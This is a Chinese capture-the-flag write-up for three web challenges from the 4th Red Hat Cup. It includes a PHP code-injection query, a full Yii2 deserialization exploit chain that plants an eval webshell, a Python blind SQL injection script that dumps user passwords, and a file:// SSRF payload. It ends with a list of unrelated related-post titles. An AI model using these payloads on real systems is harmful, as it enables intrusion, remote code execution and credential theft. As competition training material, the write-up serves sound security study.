第四届红帽杯网络安全大赛 Web 部分writeup
前言
记录一下web的wp,随手写的,只会前三题,确实都很简单。
find_it
扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag:
?code=<?= show_source(glob('./*')[2]);
再访问hack.php:
base32解密一下即可得到flag。
framework
是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打:
<?phpnamespace yii\rest{class IndexAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess = 'assert';$this->id = 'file_put_contents("feng.php","<?php eval(\$_POST[0]);?>");exit();';}}
}
namespace yii\db{use yii\web\DbSession;class BatchQueryResult{private $_dataReader;public function __construct(){$this->_dataReader=new DbSession();}}
}
namespace yii\web{use yii\rest\IndexAction;class DbSession{public $writeCallback;public function __construct(){$a=new IndexAction();$this->writeCallback=[$a,'run'];}}
}namespace{use yii\db\BatchQueryResult;echo base64_encode(serialize(new BatchQueryResult()));
}
蚁剑连上去feng.php,然后拿出绕过disable_functions的插件,直接秒,然后/readflag
:
WebsiteManger
f12看到<div class="avtar"><img src="data:image.php?id=3" width="200" height="200"/></div>
所以image.php
存在SQL注入,经过一系列fuzz,写个python脚本跑一下:
"""
Author:feng
"""
import requestsurl='http://eci-2zefme7yqvztlaat6my5.cloudeci1.ichunqiu.com/image.php'flag=''
for i in range(1,100):length=len(flag)min=32max=128while 1:j=min+(max-min)//2if min==j:flag+=chr(j)print(flag)break#payload="if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{},1))<{},sleep(0.5),1)".format(i,j)#payload="0/**/or/**/if(ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))<{},1,0)".format(i,j)#payload="0/**/or/**/if(ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='users'),{},1))<{},1,0)".format(i,j)payload="0/**/or/**/if(ascii(substr((select/**/group_concat(password)from/**/users),{},1))<{},1,0)".format(i,j)params={'id':payload}r=requests.get(url=url,params=params)#print(r.text)if len(r.text)>200:max=jelse :min=j"images,users"
"username,password"
"admin" "d6ec745f9d22e6a9ee099"
然后直接登录,curl.php似乎是SSRF,直接读/flag:
host=file%3A%2F%2F%2Fflag&referer=
第四届红帽杯网络安全大赛 Web 部分writeup相关推荐
- 2021第四届红帽杯网络安全大赛-线上赛Writeup
文章目录 MISC 签到 colorful code WEB find_it framework WebsiteManger ezlight 记录一下被锤爆的一天-orz MISC 签到 签到抢了个二 ...
- 2022第二届网刃杯网络安全大赛-Web
2022第二届网刃杯网络安全大赛-Web 前言 提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.Web2-upload 难度系数:4.0 题目描述:只有想不到,没有做不到,sql yy ...
- [CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it 看群里说CTFHub上复现了, 我来看看 本来想按照红帽杯的套路来试一下,发现phpinfo里莫得flag了 只能想想其他 ...
- CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(布尔盲注.SSRF ) 场景描述:最新的网站测试器,作为非站长的你,能利用好它的功能吗? 场景打开后,如下,是个登 ...
- i春秋网鼎杯网络安全大赛advanced题目writeup
今天打了护网杯 发现啥也不会 悲伤 就想起来了未完成的网鼎杯 来补坑(通过观摩大佬writeup) file命令查看是一个64位的ELF文件 运行后无交互动作 只输出 welcome ...
- 第三届广东省强网杯网络安全大赛WEB题writeup
1. 小明又被拒绝了 直接访问根目录,报403错误 一般是做了ip限制,加上 X-Forwarded-For 头即可绕过 接着又提示不是管理员,仔细看响应头的 Set-Cookie ,有个 admin ...
- 第二届网刃杯网络安全大赛 Writeup
第二届网刃杯网络安全大赛 Writeup 前言 MISC 玩坏的XP * ISC ncsubj carefulguy easyiec xypo7 喜欢移动的黑客* LED_BOOM* 需要安全感* c ...
- [2021首届“陇剑杯”网络安全大赛 决赛]内存取证writeup
决赛不能联网-手上有只有vol2.6,这道题完全死了 文章目录 [2021首届"陇剑杯"网络安全大赛 决赛]内存取证 writeup 产品密钥 匿名邮箱 远控后门 数据清除时间 [ ...
- 【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz
[2020年第二届"网鼎杯"网络安全大赛 青龙组]Web AreUSerialz http://94b1c2d4231f4b4bb92162d5e89dec8f5817750c48 ...
最新文章
- 计算机考研b区国家线,考研b区国家线历年分数线情况
- Docker中运行EOS FOR MAC
- SQL中的函数 •Aggregate 函数 •Scalar 函数
- WinForm------GridControl添加底部合计框
- 集成电路可测性设计(DFT,Design For Testability)
- 渗透测试:初识Kali之Kali系统安装及基本配置
- matlab进化树的下载,Dendroscope(进化树显示分析软件)
- alphapose的使用
- 使用GROUP BY分组
- 小米官网新头部logo保存CSS中显示不全问题
- 如何在C加加的面向对象写游戏 我的世界
- 苹果appstore新推出了抽成收益降到15%的计划,正在申请中...
- 重生之我是赏金猎人-漏洞挖掘(十一)-某SRC储存XSS多次BypassWAF挖掘
- android 登陆微信一直卡在验证身份,微信登录需要滑块验证的时候,闪退返回至登录界面...
- 最新SEO外链自动发布外链工具网站源码开源
- 大数据面前无隐私 到底谁才是老大哥
- 【解决SQL Server sa连接服务器失败】用户‘sa‘登录失败。已成功与服务器建立连接,但是在登录过程中发生错误
- 网络安全学习笔记1.2.1网络系统面临的安全威胁——恶意代码
- 小说漫画,影视系统,搭建一站式解决方案小说红利项目火爆
- php变量值传给html,如何将PHP变量传递给新的HTML页面?